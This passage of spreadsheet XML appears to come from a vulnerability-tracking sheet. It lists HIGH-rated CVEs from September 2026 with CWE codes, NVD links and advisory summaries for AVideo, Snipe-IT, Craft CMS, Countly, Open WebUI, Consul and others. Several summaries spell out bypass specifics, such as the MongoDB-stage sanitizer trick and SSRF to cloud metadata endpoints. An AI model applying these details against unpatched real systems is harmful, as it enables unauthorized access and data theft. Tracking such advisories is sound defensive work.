      <c r="B3325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86725</t>
        </is>
      </c>
      <c r="C3325" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3325" s="5" t="inlineStr"/>
      <c r="F3325" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3325" s="5" t="inlineStr"/>
      <c r="H3325" s="5" t="inlineStr"/>
      <c r="I3325" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3325" s="5" t="inlineStr"/>
      <c r="K3325" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3325" s="5" t="inlineStr">
        <is>
          <t>AVideo through c3edcc274c389816d434acadac07ee78eaf330c1 contains a missing authorization vulnerability in the SocialMediaPublisher plugin's add.json.php endpoint that allows authenticated users to modify other users' OAuth token records. Attackers can supply arbitrary row IDs to overwrite another user's stored access_token and refresh_token, then delete the compromised record to destroy the victim's provider linkage.</t>
        </is>
      </c>
      <c r="M3325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86725</t>
        </is>
      </c>
    </row>
    <row r="3326">
      <c r="A3326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86726</t>
        </is>
      </c>
      <c r="C3326" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3326" s="5" t="inlineStr"/>
      <c r="F3326" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3326" s="5" t="inlineStr"/>
      <c r="H3326" s="5" t="inlineStr"/>
      <c r="I3326" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3326" s="5" t="inlineStr"/>
      <c r="K3326" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L3326" s="5" t="inlineStr">
        <is>
          <t>AVideo through 29.0 contains an information disclosure vulnerability in restreamsActive.json.php that allows authenticated streamers to enumerate source stream keys and identities of all other streamers' active restreams. The endpoint fails to filter results by user ownership, exposing sensitive transmission credentials and streamer identity across all accounts to any user with streaming capability.</t>
        </is>
      </c>
      <c r="M3326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86726</t>
        </is>
      </c>
    </row>
    <row r="3327">
      <c r="A3327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86731</t>
        </is>
      </c>
      <c r="C3327" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3327" s="5" t="inlineStr"/>
      <c r="F3327" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3327" s="5" t="inlineStr"/>
      <c r="H3327" s="5" t="inlineStr"/>
      <c r="I3327" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3327" s="5" t="inlineStr"/>
      <c r="K3327" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3327" s="5" t="inlineStr">
        <is>
          <t>Craft CMS versions 5.0.0-RC1 through 5.10.11 are missing an admin-target guard in UsersController::actionActivateUser (the users/activate-user action). While the action requires the administrateUsers permission, it does not call requireAdmin() when the targeted user is an administrator, unlike the mirror action actionDeactivateUser. As a result, an authenticated control panel user who is not an administrator but holds the administrateUsers permission can activate a pending or deliberately deactivated administrator account, which can lead to permission escalation when combined with resetting that account's password. The issue is fixed in Craft CMS 5.10.12.</t>
        </is>
      </c>
      <c r="M3327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86731</t>
        </is>
      </c>
    </row>
    <row r="3328">
      <c r="A3328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86734</t>
        </is>
      </c>
      <c r="C3328" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3328" s="5" t="inlineStr"/>
      <c r="F3328" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3328" s="5" t="inlineStr"/>
      <c r="H3328" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="I3328" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3328" s="5" t="inlineStr"/>
      <c r="K3328" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3328" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.1 fails to validate the length of the note field in the POST /account/accept/{acceptance} endpoint, allowing authenticated users to submit unbounded input that reaches synchronous CommonMark rendering. Attackers can submit large note values to exhaust PHP worker CPU and cause denial of service through resource exhaustion in the markdown parsing pipeline.</t>
        </is>
      </c>
      <c r="M3328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86734</t>
        </is>
      </c>
    </row>
    <row r="3329">
      <c r="A3329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86757</t>
        </is>
      </c>
      <c r="C3329" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3329" s="5" t="inlineStr"/>
      <c r="F3329" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3329" s="5" t="inlineStr"/>
      <c r="H3329" s="5" t="inlineStr"/>
      <c r="I3329" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3329" s="5" t="inlineStr"/>
      <c r="K3329" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3329" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly gate access to encrypted custom-field values in asset form templates for listbox, textarea, markdown-textarea, and date/datetime picker elements. Authenticated users with assets.edit, assets.checkin, assets.checkout, or assets.audit permissions can read plaintext encrypted custom field values by opening asset forms, bypassing the assets.view.encrypted_custom_fields permission check.</t>
        </is>
      </c>
      <c r="M3329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86757</t>
        </is>
      </c>
    </row>
    <row r="3330">
      <c r="A3330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86758</t>
        </is>
      </c>
      <c r="C3330" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3330" s="5" t="inlineStr"/>
      <c r="F3330" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3330" s="5" t="inlineStr"/>
      <c r="H3330" s="5" t="inlineStr"/>
      <c r="I3330" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3330" s="5" t="inlineStr"/>
      <c r="K3330" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="L3330" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly enforce the viewKeys authorization gate in CSV export and API index endpoints, allowing authenticated users with only licenses.view permission to access product keys. Attackers can download all license keys in bulk via CSV export or validate candidate keys through API response discrepancies without needing the viewKeys permission.</t>
        </is>
      </c>
      <c r="M3330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86758</t>
        </is>
      </c>
    </row>
    <row r="3331">
      <c r="A3331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86759</t>
        </is>
      </c>
      <c r="C3331" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3331" s="5" t="inlineStr"/>
      <c r="F3331" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3331" s="5" t="inlineStr"/>
      <c r="H3331" s="5" t="inlineStr"/>
      <c r="I3331" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3331" s="5" t="inlineStr"/>
      <c r="K3331" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3331" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to authorize the POST /hardware/history endpoint, allowing any authenticated user to reassign arbitrary assets and modify audit logs. Attackers can submit a CSV file to reassign assets across companies and inject fraudulent audit trail entries, compromising inventory integrity and accountability.</t>
        </is>
      </c>
      <c r="M3331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86759</t>
        </is>
      </c>
    </row>
    <row r="3332">
      <c r="A3332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86764</t>
        </is>
      </c>
      <c r="C3332" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3332" s="5" t="inlineStr"/>
      <c r="F3332" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3332" s="5" t="inlineStr"/>
      <c r="H3332" s="5" t="inlineStr"/>
      <c r="I3332" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3332" s="5" t="inlineStr"/>
      <c r="K3332" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3332" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT through 8.6.4 (fixed in 8.7.0) does not enforce the components.view permission on the authenticated endpoint GET /api/v1/hardware/&lt;asset-id&gt;/assigned/components. The endpoint authorizes only assets.view on the parent asset before returning linked component details; the components.view check is applied only to the response's available_actions.view flag and not to the returned data. As a result, an authenticated user holding only assets.view can enumerate component IDs, names, assigned quantities, and notes that are otherwise protected — the direct GET /api/v1/components/&lt;id&gt; endpoint correctly returns 403 Forbidden for such users.</t>
        </is>
      </c>
      <c r="M3332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86764</t>
        </is>
      </c>
    </row>
    <row r="3333">
      <c r="A3333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86765</t>
        </is>
      </c>
      <c r="C3333" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3333" s="5" t="inlineStr"/>
      <c r="F3333" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3333" s="5" t="inlineStr"/>
      <c r="H3333" s="5" t="inlineStr"/>
      <c r="I3333" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3333" s="5" t="inlineStr"/>
      <c r="K3333" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3333" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to enforce checkout authorization when assignment fields are submitted to the asset update endpoint. Authenticated users with edit permission but explicitly denied checkout permission can reassign assets, bypass check-in procedures, and alter custody records by submitting assigned_user, assigned_asset, or assigned_location parameters to PATCH /api/v1/hardware/{id}.</t>
        </is>
      </c>
      <c r="M3333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86765</t>
        </is>
      </c>
    </row>
    <row r="3334">
      <c r="A3334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86766</t>
        </is>
      </c>
      <c r="C3334" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3334" s="5" t="inlineStr"/>
      <c r="F3334" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3334" s="5" t="inlineStr"/>
      <c r="H3334" s="5" t="inlineStr"/>
      <c r="I3334" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3334" s="5" t="inlineStr"/>
      <c r="K3334" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L3334" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions up to and including 8.6.3 contain a race condition (TOCTOU) in the consumable checkout API endpoint (POST /api/v1/consumables/{consumable_id}/checkout). The requested quantity is validated against the number of remaining units before the database transaction begins, and the transaction then creates the checkout records without locking the consumable row or re-checking availability. An authenticated user with permission to check out consumables can submit concurrent checkout requests for the same consumable so that both requests pass the availability check and succeed, over-allocating stock and driving the remaining inventory negative (e.g., a consumable with 1 remaining unit ends at -1 after two concurrent 1-unit checkouts). The issue is fixed in 8.7.0, which re-fetches the parent row under lockForUpdate inside the transaction and re-validates availability.</t>
        </is>
      </c>
      <c r="M3334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86766</t>
        </is>
      </c>
    </row>
    <row r="3335">
      <c r="A3335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87072</t>
        </is>
      </c>
      <c r="C3335" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3335" s="5" t="inlineStr"/>
      <c r="F3335" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3335" s="5" t="inlineStr"/>
      <c r="H3335" s="5" t="inlineStr"/>
      <c r="I3335" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3335" s="5" t="inlineStr"/>
      <c r="K3335" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3335" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M3335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87072</t>
        </is>
      </c>
    </row>
    <row r="3336">
      <c r="A3336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87803</t>
        </is>
      </c>
      <c r="C3336" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3336" s="5" t="inlineStr"/>
      <c r="F3336" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3336" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3336" s="5" t="inlineStr"/>
      <c r="I3336" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3336" s="5" t="inlineStr"/>
      <c r="K3336" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3336" s="5" t="inlineStr">
        <is>
          <t>An authorization bypass vulnerability exists in the Countly Server DBViewer due to flawed sub-pipeline detection in the aggregation stage sanitizer. The /o/db aggregation endpoint parses user-controlled aggregation JSON and passes it through a stage sanitizer that determines whether a nested array is a sub-pipeline by checking if every element contains a key present in a hardcoded KNOWN_STAGE_OPERATORS set. If any element contains an unrecognized stage key, such as the undocumented MongoDB-internal $_internalInhibitOptimization, the sanitizer misclassifies the entire branch as a generic array and skips stage-level stripping for all sibling stages. This allows a non-admin user with DBViewer read permission to inject forbidden operators like $lookup inside $facet sub-pipelines, performing cross-collection joins into restricted collections. This leads to unauthorized read access to sensitive data including password-reset tokens (prid), enabling account takeover.</t>
        </is>
      </c>
      <c r="M3336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87803</t>
        </is>
      </c>
    </row>
    <row r="3337">
      <c r="A3337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87809</t>
        </is>
      </c>
      <c r="C3337" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3337" s="5" t="inlineStr"/>
      <c r="F3337" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3337" s="5" t="inlineStr"/>
      <c r="H3337" s="5" t="inlineStr"/>
      <c r="I3337" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3337" s="5" t="inlineStr"/>
      <c r="K3337" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3337" s="5" t="inlineStr">
        <is>
          <t>Siyuan before v3.8.2 fails to apply publish-access filtering to embedded blocks before rendering in the /api/export/preview and /api/lute/copyStdMarkdown endpoints. Attackers with reader access can retrieve the full rendered content of private, hidden, or publish-disabled blocks by accessing public documents containing embed queries that select those blocks.</t>
        </is>
      </c>
      <c r="M3337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87809</t>
        </is>
      </c>
    </row>
    <row r="3338">
      <c r="A3338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87818</t>
        </is>
      </c>
      <c r="C3338" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3338" s="5" t="inlineStr"/>
      <c r="F3338" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3338" s="5" t="inlineStr">
        <is>
          <t>oracle, python</t>
        </is>
      </c>
      <c r="H3338" s="5" t="inlineStr"/>
      <c r="I3338" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3338" s="5" t="inlineStr"/>
      <c r="K3338" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L3338"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M3338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87818</t>
        </is>
      </c>
    </row>
    <row r="3339">
      <c r="A3339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87821</t>
        </is>
      </c>
      <c r="C3339" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3339" s="5" t="inlineStr"/>
      <c r="F3339" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3339" s="5" t="inlineStr"/>
      <c r="H3339" s="5" t="inlineStr"/>
      <c r="I3339" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3339" s="5" t="inlineStr"/>
      <c r="K3339" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3339" s="5" t="inlineStr">
        <is>
          <t>Lara Dashboard through 1.3.1 contains a server-side request forgery vulnerability in the POST /api/admin/builder/markdown/fetch endpoint that allows any authenticated user to fetch arbitrary URLs and read the response body. Attackers can read internal HTTP services and cloud metadata including IAM credentials by supplying malicious URLs without host validation or redirect restrictions.</t>
        </is>
      </c>
      <c r="M3339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87821</t>
        </is>
      </c>
    </row>
    <row r="3340">
      <c r="A3340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87961</t>
        </is>
      </c>
      <c r="C3340" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3340" s="5" t="inlineStr"/>
      <c r="F3340" s="5" t="inlineStr"/>
      <c r="G3340" s="5" t="inlineStr"/>
      <c r="H3340" s="5" t="inlineStr"/>
      <c r="I3340" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3340" s="5" t="inlineStr"/>
      <c r="K3340" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3340" s="5" t="inlineStr">
        <is>
          <t>ESP32-audioI2S versions 3.4.4 through 4.0.0 contain a heap-based out-of-bounds read vulnerability in the read_ID3_Header function due to a shadowed length parameter in ID3 synchronized-lyrics processing. Attackers can craft malicious MP3 files or HTTP audio streams with oversized frame size declarations to read past allocated buffer boundaries, causing device crashes or exposing adjacent heap memory.</t>
        </is>
      </c>
      <c r="M3340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87961</t>
        </is>
      </c>
    </row>
    <row r="3341">
      <c r="A3341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87998</t>
        </is>
      </c>
      <c r="C3341" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3341" s="5" t="inlineStr"/>
      <c r="F3341" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3341" s="5" t="inlineStr"/>
      <c r="H3341" s="5" t="inlineStr"/>
      <c r="I3341" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3341" s="5" t="inlineStr"/>
      <c r="K3341" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="L3341" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.1, DELETE /api/v1/knowledge/{id}/delete in backend/open_webui/routers/knowledge.py authorized deletion against the knowledge base but then removed its administrator-owned external connection without a separate administrator check or a check for other dependent knowledge bases. A non-administrator with write access to one external knowledge base could delete shared instance configuration and make every other knowledge base using that connection unavailable. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M3341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87998</t>
        </is>
      </c>
    </row>
    <row r="3342">
      <c r="A3342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87999</t>
        </is>
      </c>
      <c r="C3342" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3342" s="5" t="inlineStr"/>
      <c r="F3342" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3342" s="5" t="inlineStr">
        <is>
          <t>python, azure</t>
        </is>
      </c>
      <c r="H3342" s="5" t="inlineStr"/>
      <c r="I3342" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3342" s="5" t="inlineStr"/>
      <c r="K3342" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3342" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. Prior to 0.11.1, POST /api/v1/retrieval/process/web and POST /api/v1/retrieval/process/web/search in backend/open_webui/retrieval/web/utils.py treated Python's globally routable address classification as proof that a destination was external. An authenticated user could make an Azure-hosted instance fetch and return content from 168.63.129.16, the Azure platform channel, as well as other reserved ranges that the standard classification did not reject. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M3342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87999</t>
        </is>
      </c>
    </row>
    <row r="3343">
      <c r="A3343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88016</t>
        </is>
      </c>
      <c r="C3343" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3343" s="5" t="inlineStr"/>
      <c r="F3343" s="5" t="inlineStr"/>
      <c r="G3343" s="5" t="inlineStr"/>
      <c r="H3343" s="5" t="inlineStr"/>
      <c r="I3343" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3343" s="5" t="inlineStr"/>
      <c r="K3343" s="5" t="inlineStr">
        <is>
          <t>CWE-281, CWE-59</t>
        </is>
      </c>
      <c r="L3343"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M3343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88016</t>
        </is>
      </c>
    </row>
    <row r="3344">
      <c r="A3344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88021</t>
        </is>
      </c>
      <c r="C3344" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3344" s="5" t="inlineStr"/>
      <c r="F3344" s="5" t="inlineStr"/>
      <c r="G3344" s="5" t="inlineStr"/>
      <c r="H3344" s="5" t="inlineStr"/>
      <c r="I3344" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3344" s="5" t="inlineStr"/>
      <c r="K3344" s="5" t="inlineStr">
        <is>
          <t>CWE-185</t>
        </is>
      </c>
      <c r="L3344" s="5" t="inlineStr">
        <is>
          <t>Consul and Consul Enterprise are vulnerable to an authorization bypass in the Connect service mesh that may allow a service to reach a destination it is not authorized to access. When building Envoy RBAC rules to enforce Connect intentions, Consul did not correctly escape certain characters in service names, namespaces, and partitions, causing the generated authorization rules to match more broadly than intended. This vulnerability (CVE-2026-88021) is fixed in Consul 2.0.4 and Consul Enterprise 1.21.18, 1.22.12 and 2.0.4.</t>
        </is>
      </c>
      <c r="M3344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88021</t>
        </is>
      </c>
    </row>
    <row r="3345">
      <c r="A3345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88026</t>
        </is>
      </c>
      <c r="C3345" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3345" s="5" t="inlineStr"/>
      <c r="F3345" s="5" t="inlineStr"/>
      <c r="G3345" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3345" s="5" t="inlineStr"/>
      <c r="I3345" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3345" s="5" t="inlineStr"/>
      <c r="K3345" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L3345" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of regular-expression metacharacters in the LINQ query translation component of the MongoDB C# Driver can cause a caller-supplied character sequence to alter a regular-expression predicate generated by an affected application. An authenticated user who can influence such a value may cause the application to return records beyond those intended by the original filter.</t>
        </is>
      </c>
      <c r="M3345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88026</t>
        </is>
      </c>
    </row>
    <row r="3346">
      <c r="A3346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88027</t>
        </is>
      </c>
      <c r="C3346" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3346" s="5" t="inlineStr"/>
      <c r="F3346" s="5" t="inlineStr"/>
      <c r="G3346" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3346" s="5" t="inlineStr"/>
      <c r="I3346" s="5" t="inlineStr">
        <is>
